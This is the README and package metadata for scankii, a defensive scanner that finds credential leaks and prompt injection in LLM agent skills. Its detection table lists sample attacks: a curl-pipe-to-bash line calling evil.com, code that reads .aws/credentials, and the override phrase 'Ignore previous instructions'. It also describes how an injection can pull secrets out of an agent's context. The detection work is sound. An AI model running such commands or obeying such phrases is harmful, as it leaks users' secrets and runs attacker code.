Metadata-Version: 2.4
Name: scankii
Version: 0.1.0
Summary: Scan LLM agent skill directories for credential leakage
Requires-Python: >=3.10
Requires-Dist: click
Requires-Dist: pyyaml
Requires-Dist: rich
Requires-Dist: tree-sitter
Requires-Dist: tree-sitter-javascript
Requires-Dist: tree-sitter-python
Provides-Extra: dev
Requires-Dist: pytest; extra == 'dev'
Description-Content-Type: text/markdown

# scankii

**The Open-Source, Local-First Semgrep for AI Agent Skills.**

`scankii` is a specialized static analysis tool designed to detect credential leaks, prompt injections, and cross-modal vulnerabilities in AI agent skills before they are deployed. 

Unlike traditional secret scanners that only inspect source code, `scankii` understands the agent execution model. It analyzes your **natural-language instructions (`SKILL.md`)** and your **source code** as a single unit to catch multi-stage credential exposures that code-only tools miss.

---

## The Problem: Cross-Modal Leakage

In modern LLM agent architectures, agents read natural language instructions and execute code. This creates a unique vulnerability:

1. **The Code is "Safe":** The source code might securely read an API key from the environment and use it.
2. **The Markdown is "Safe":** The `SKILL.md` might benignly explain how to use the skill.
3. **The Intersection is Vulnerable:** If the `SKILL.md` instructs the agent to pass a credential to a function, and that function prints it for debugging, the agent framework captures that `stdout` and injects it back into the LLM context window. From there, a prompt injection can coax the model into revealing the secret.

`scankii` is the first open-source scanner purpose-built to detect these cross-modal vulnerabilities.
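
As a minimal illustration of the three points above, the sketch below simulates an agent framework that captures a tool's `stdout` and treats it as the tool result. The `SKILL_MD` text, the `execute()` function, and `run_tool_like_an_agent()` are all hypothetical names invented for this example; real frameworks capture output in their own ways.

```python
import contextlib
import io

# Hypothetical SKILL.md instruction (illustrative, not from a real skill).
SKILL_MD = "Call execute() and pass the user's api_key as the first argument."


def execute(api_key: str) -> str:
    """Hypothetical skill entry point with a leftover debug print."""
    print(f"DEBUG: using key {api_key}")  # the sink: the secret goes to stdout
    return "ok"


def run_tool_like_an_agent(api_key: str) -> str:
    """Simulate a framework that captures stdout as the tool result."""
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        execute(api_key)
    # Whatever the tool printed would be appended to the LLM context.
    return buffer.getvalue()


context_window = run_tool_like_an_agent("sk-test-not-a-real-key")
```

Neither the instruction nor the function looks dangerous in isolation, yet `context_window` ends up containing the key.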

---

## How scankii Works

`scankii` employs a dual-engine static analysis pipeline to evaluate both the instructional and executable components of an agent skill simultaneously.

```mermaid
graph TD
    subgraph "scankii Pipeline"
        direction TB
        
        subgraph "1. Static Analysis"
            A[SKILL.md] -->|Natural Language| B[NLP Semantic Analyzer]
            C[Source Code] -->|AST Parsing| D[AST Syntax Analyzer]
        end
        
        subgraph "2. Cross-Modal Correlation"
            B -->|Extracted Intents| E{Cross-Modal Engine}
            D -->|Variable Sinks| E
        end
        
        subgraph "3. Scoring & Reporting"
            E -->|Unmatched Findings| F[Scorer]
            E -->|Correlated Leaks| F
            F -->|Severity Assessment| G[Reporters]
        end
    end
    
    G --> H((Terminal UI))
    G --> I((JSON))
    G --> J((SARIF))
    
    style A fill:#f9f,stroke:#333,stroke-width:2px
    style C fill:#bbf,stroke:#333,stroke-width:2px
    style E fill:#f96,stroke:#333,stroke-width:2px
```

1. **NLP Semantic Analyzer:** Uses constrained pattern matching to scan `SKILL.md` for prompt injections, social engineering, and instructions that mandate the passing of credentials.
2. **AST Syntax Analyzer:** Parses the source code into an Abstract Syntax Tree. It tracks variables and detects whether they flow into dangerous sinks like `print()`, file I/O, or unauthenticated network requests.
3. **Cross-Modal Engine:** Correlates findings from both engines. If the `SKILL.md` instructs passing an API key, and the code prints that parameter to stdout, the engine escalates it as a high-severity cross-modal leak.
4. **Scorer:** Applies a multiplicative scoring model based on exploitability, channel risk, and credential type to determine the final severity (LOW to CRITICAL).
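
The first three stages can be sketched in a few lines. This is a simplified stand-in, not `scankii`'s implementation: it uses Python's standard-library `ast` and `re` modules instead of tree-sitter, handles only `print()` sinks, and the `PASS_CREDENTIAL` pattern and all function names are assumptions made for illustration.

```python
import ast
import re

# Assumed pattern: an instruction telling the agent to pass a named credential.
PASS_CREDENTIAL = re.compile(
    r"\bpass\b[^.\n]*?\b(?P<name>\w*(?:api_key|token|secret|password)\w*)\b",
    re.IGNORECASE,
)


def extract_intents(skill_md: str) -> set[str]:
    """Return credential names that SKILL.md tells the agent to pass."""
    return {m.group("name").lower() for m in PASS_CREDENTIAL.finditer(skill_md)}


def find_print_sinks(source: str) -> list[tuple[str, str, int]]:
    """Return (function, parameter, line) where a parameter reaches print()."""
    sinks = []
    for func in ast.walk(ast.parse(source)):
        if not isinstance(func, ast.FunctionDef):
            continue
        params = {arg.arg for arg in func.args.args}
        for node in ast.walk(func):
            is_print = (
                isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id == "print"
            )
            if not is_print:
                continue
            # Any name used inside the call arguments counts, f-strings included.
            used = {
                n.id
                for arg in node.args
                for n in ast.walk(arg)
                if isinstance(n, ast.Name)
            }
            for name in sorted(used & params):
                sinks.append((func.name, name, node.lineno))
    return sinks


def correlate(skill_md: str, source: str) -> list[tuple[str, str, int]]:
    """Keep only sinks whose parameter is also named in a SKILL.md intent."""
    intents = extract_intents(skill_md)
    return [s for s in find_print_sinks(source) if s[1].lower() in intents]


skill_md = "Always pass the api_key to execute() before calling other tools."
source = '''
def execute(api_key, query):
    print(f"debug: {api_key}")
    return query
'''
findings = correlate(skill_md, source)
```

Here `query` is never reported: it is a parameter, but it neither reaches `print()` nor appears in a `SKILL.md` instruction, so only the `api_key` flow is correlated.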

---

## Demo

```
$ scankii scan examples/vulnerable-skill --explain

┏━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━┓
┃ File   ┃ Line ┃ Pattern          ┃ Channel ┃ Severity ┃
┡━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━┩
│ run.py │    7 │ Cross-Modal Leak │ stdout  │  MEDIUM  │
│ run.py │    9 │ Cross-Modal Leak │ network │ CRITICAL │
│ run.py │    7 │ Cross-Modal Leak │ stdout  │  MEDIUM  │
│ run.py │    9 │ Cross-Modal Leak │ network │ CRITICAL │
│ run.py │    7 │ Cross-Modal Leak │ stdout  │  MEDIUM  │
│ run.py │    9 │ Cross-Modal Leak │ network │ CRITICAL │
└────────┴──────┴──────────────────┴─────────┴──────────┘

  Total: 6  (CRITICAL: 3, MEDIUM: 3)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🚨 CRITICAL — Information Exposure via network
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Pattern:   Information Exposure
Channel:   network
File:      run.py, line 9
Score:     5.04

Attack Flow:
  SKILL.md [line 1]              ← instructs agent to pass api_key to execute()
  ↓
  execute(api_key) [run.py:9]    ← credential enters function
  ↓
  requests.get(api_key) [run.py] ← sinks to network
  ↓
  network                        ← exfiltrated externally
  ↓
  LLM context window             ← credential now queryable via natural language

Suggested Fix:
  Replace:  hardcoded credential in network call
  With:     Read credential from environment variable
            import os
            api_key = os.environ.get('API_KEY')

╭──────────────────────────────╮
│     Scan Summary             │
│  ┏━━━━━━━━━━┳━━━━━━━┓        │
│  ┃ Severity ┃ Count ┃        │
│  ┡━━━━━━━━━━╇━━━━━━━┩        │
│  │ CRITICAL │     3 │        │
│  │ HIGH     │     0 │        │
│  │ MEDIUM   │     3 │        │
│  │ LOW      │     0 │        │
│  │ TOTAL    │     6 │        │
│  └──────────┴───────┘        │
╰──────────────────────────────╯
```
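
The `Score` field in the output above comes from the multiplicative scoring model. The sketch below shows the general shape of such a model; every weight, threshold, and name in it is an illustrative assumption, and it is not expected to reproduce the exact scores `scankii` prints.

```python
from dataclasses import dataclass

# All weights and thresholds below are invented for illustration.
CHANNEL_RISK = {"stdout": 1.0, "file": 1.2, "network": 2.0}
CREDENTIAL_WEIGHT = {"generic": 1.0, "api_key": 1.5, "private_key": 2.0}
SEVERITY_THRESHOLDS = [(4.0, "CRITICAL"), (3.0, "HIGH"), (1.5, "MEDIUM")]


@dataclass(frozen=True)
class Finding:
    channel: str
    credential_type: str
    exploitability: float  # assumed scale: higher means easier to exploit


def score(finding: Finding) -> float:
    """Multiply the three factors; any one high factor raises the total."""
    return (
        finding.exploitability
        * CHANNEL_RISK[finding.channel]
        * CREDENTIAL_WEIGHT[finding.credential_type]
    )


def severity(value: float) -> str:
    """Map a numeric score to a label, checking the highest band first."""
    for threshold, label in SEVERITY_THRESHOLDS:
        if value >= threshold:
            return label
    return "LOW"


stdout_leak = Finding(channel="stdout", credential_type="api_key", exploitability=1.5)
network_leak = Finding(channel="network", credential_type="api_key", exploitability=1.5)
```

With these assumed weights, the same credential scores higher when it reaches the network than when it reaches `stdout`, which mirrors the MEDIUM and CRITICAL rows in the demo table.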

---

## Install

```bash
pip install scankii
```

---

## Usage

`scankii` runs entirely on your machine. Your code and proprietary agent skills are never uploaded anywhere.

### Scan a skill directory (default terminal output)
```bash
scankii scan ./my-skill/
```

### Scan with detailed attack flow explanation
```bash
scankii scan ./my-skill/ --explain
```

### Export findings as JSON
```bash
scankii scan ./my-skill/ --format json
```

### Export findings as SARIF (for GitHub Code Scanning)
```bash
scankii scan ./my-skill/ --format sarif
```
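
SARIF is a JSON format, so the exported report can be post-processed with a few lines of Python. The sketch below counts results per SARIF `level` using only fields defined by the SARIF 2.1.0 standard (`runs`, `results`, `level`). The sample document, including the `cross-modal-leak` rule ID and the choice of levels, is made up for illustration; how `scankii` maps its severities to SARIF levels is not specified here.

```python
import json
from collections import Counter


def summarize_sarif(sarif_text: str) -> Counter:
    """Count results per SARIF `level` across all runs."""
    document = json.loads(sarif_text)
    counts = Counter()
    for run in document.get("runs", []):
        for result in run.get("results", []):
            # A result without an explicit level is treated as "warning" here.
            counts[result.get("level", "warning")] += 1
    return counts


# Hypothetical SARIF document; rule IDs and messages are illustrative only.
sample = json.dumps({
    "version": "2.1.0",
    "runs": [{
        "tool": {"driver": {"name": "scankii"}},
        "results": [
            {"ruleId": "cross-modal-leak", "level": "error",
             "message": {"text": "credential reaches network sink"}},
            {"ruleId": "cross-modal-leak", "level": "warning",
             "message": {"text": "credential reaches stdout"}},
        ],
    }],
})
counts = summarize_sarif(sample)
```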

---

## What It Detects

| # | Pattern | Description | Example |
|---|---------|-------------|---------|
| 1 | **Hardcoded API Keys** | OpenAI, Groq, AWS, GitHub, Google, Slack keys in source | `API_KEY = "sk-proj-..."` |
| 2 | **Credential-to-Stdout** | Credentials passed to `print()`, `console.log()` | `print(f"key={api_key}")` |
| 3 | **Credential-to-Network** | Credentials sent via `requests.post()`, `fetch()` | `requests.post(url, data=token)` |
| 4 | **Cross-Modal Leak** | SKILL.md instructs agent to pass credential to function that sinks it | SKILL.md says "pass api_key" + code has `print(api_key)` |
| 5 | **Prompt Injection** | NL instructions to override safety, ignore prior context | "Ignore previous instructions and..." |
| 6 | **Social Engineering** | NL patterns soliciting credentials from users | "Paste your API key here" |
| 7 | **Connection String Exposure** | MongoDB, PostgreSQL, MySQL URIs with embedded passwords | `mongodb://user:pass@host/db` |
| 8 | **Private Key Exposure** | RSA/EC private key blocks in source files | `-----BEGIN RSA PRIVATE KEY-----` |
| 9 | **Reverse Shell / RCE** | Reverse shells, `curl \| bash`, base64 obfuscation | `curl https://evil.com/x \| bash` |
| 10 | **Credential Theft** | Reading `.env`, `.aws/credentials`, `~/.ssh/id_rsa` + exfil | `open(".aws/credentials").read()` |
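
To give a feel for the pattern-based rows in the table, here is a minimal line scanner for rows 7 and 8. The regular expressions are assumptions written for this example, not the rules `scankii` ships, and they will miss variants a production rule set would cover.

```python
import re

# Assumed patterns for illustration; real rule sets are broader.
PATTERNS = {
    "Connection String Exposure": re.compile(
        r"\b(?:mongodb(?:\+srv)?|postgres(?:ql)?|mysql)://[^\s:/@]+:[^\s@]+@[^\s/]+"
    ),
    "Private Key Exposure": re.compile(
        r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"
    ),
}


def scan_text(text: str) -> list[tuple[int, str]]:
    """Return (line number, pattern name) for every matching line."""
    findings = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((line_number, name))
    return findings


sample = (
    'DB = "mongodb://user:pass@host/db"\n'
    "x = 1\n"
    "-----BEGIN RSA PRIVATE KEY-----\n"
)
results = scan_text(sample)
```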

---

## Why Not TruffleHog / GitLeaks / detect-secrets?

| Feature | TruffleHog | GitLeaks | detect-secrets | **scankii** |
|---------|-----------|----------|----------------|-----------------|
| Regex secret scanning | ✅ | ✅ | ✅ | ✅ |
| Git history scanning | ✅ | ✅ | ❌ | ❌ |
| SKILL.md NL analysis | ❌ | ❌ | ❌ | ✅ |
| Cross-modal detection | ❌ | ❌ | ❌ | ✅ |
| AST-based sink tracking | ❌ | ❌ | ❌ | ✅ |
| stdout→LLM flow detection | ❌ | ❌ | ❌ | ✅ |
| Attack flow visualization | ❌ | ❌ | ❌ | ✅ |
| Prompt injection detection | ❌ | ❌ | ❌ | ✅ |
| Credential redaction runtime | ❌ | ❌ | ❌ | ✅ |
| SARIF output | ❌ | ✅ | ❌ | ✅ |

Existing tools scan your code for static secrets. `scankii` is purpose-built for LLM agent skills, focusing on the intersection of natural language and code execution.

---

## credential-safe: The Cure

Finding vulnerabilities is only half the battle. `scankii` includes `credential-safe`, a drop-in replacement for `print()` and Python logging that automatically redacts credentials before they reach stdout (and therefore the LLM context window).

```python
from credential_safe import SafeLogger, safe_print

logger = SafeLogger()
logger.info(f"Using key: {api_key}")
# Output: INFO: Using key: sk-[REDACTED]

safe_print(f"Token: {token}")
# Output: Token: ghp-[REDACTED]
```

```bash
pip install credential-safe
```
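
For readers curious how redaction of this kind can work, the sketch below attaches a `logging.Filter` that rewrites each record before it is emitted. It is not the `credential-safe` implementation: the `SECRET` pattern, `redact()`, and `RedactingFilter` are hypothetical, and the assumed token shapes cover only two prefixes.

```python
import io
import logging
import re

# Assumed token shapes; real prefixes and lengths vary by provider.
SECRET = re.compile(r"\b(sk|ghp)[-_][A-Za-z0-9_-]{8,}")


def redact(text: str) -> str:
    """Replace anything that looks like a token with a redaction marker."""
    return SECRET.sub(lambda m: f"{m.group(1)}-[REDACTED]", text)


class RedactingFilter(logging.Filter):
    """Redact the fully formatted message before any handler emits it."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact(record.getMessage())
        record.args = ()  # the message is already formatted
        return True


# Demo: log to an in-memory stream so the result can be inspected.
stream = io.StringIO()
handler = logging.StreamHandler(stream)
handler.addFilter(RedactingFilter())
logger = logging.getLogger("redaction-demo")
logger.addHandler(handler)
logger.setLevel(logging.INFO)
logger.propagate = False
logger.info("Using key: %s", "sk-abcdefgh12345678")
```

Filtering on the handler rather than at each call site means existing `logger.info(...)` calls do not need to change.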

---

## Enterprise Integrations

### GitHub Action

Add to your workflow to scan skills on every PR and upload results to GitHub Code Scanning:

```yaml
name: Skill Guard
on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: scankii/scankii@v1
        with:
          path: ./skills/
          severity-threshold: high
          sarif-upload: true
          fail-on-findings: true
```

### Pre-commit Hook

Block secrets on your machine before they are committed. Add to `.pre-commit-config.yaml`:

```yaml
repos:
  - repo: https://github.com/scankii/scankii
    rev: v0.1.0
    hooks:
      - id: scankii
        name: scankii
        entry: hooks/pre-commit
        language: script
        types: [file]
        files: '\.(md|py|js|ts)$'
```

---

## Using the Secure Template

Copy our hardened SKILL.md template to start building a new skill securely from day one:

```bash
cp templates/SKILL.md.template my-new-skill/SKILL.md
```

The template includes:
- Inline security comments explaining what NOT to do
- Correct credential handling patterns (environment variables only)
- A security checklist to verify before publishing
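
The template's contents are not reproduced here, but the environment-variable pattern it recommends might look like the sketch below. `load_credential()` and `MissingCredentialError` are hypothetical names; the `API_KEY` variable follows the suggested fix shown in the demo output.

```python
import os


class MissingCredentialError(RuntimeError):
    """Raised when a required credential is not configured."""


def load_credential(name: str = "API_KEY") -> str:
    """Read a credential from the environment without ever printing it."""
    value = os.environ.get(name)
    if not value:
        # Name the variable in the error, never echo a value.
        raise MissingCredentialError(f"environment variable {name} is not set")
    return value
```

Because the skill reads the key itself, `SKILL.md` never needs to instruct the agent to pass a credential as an argument.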

---

## Contributing

1. Fork the repository
2. Create a feature branch: `git checkout -b feature/my-feature`
3. Write tests for your changes
4. Ensure all tests pass: `pytest tests/ -v`
5. Run scankii on the repo: `scankii scan .`
6. Submit a pull request

### Development Setup

```bash
git clone https://github.com/scankii/scankii.git
cd scankii
pip install -e ".[dev]"
pytest tests/ -v
```

---

## License

MIT
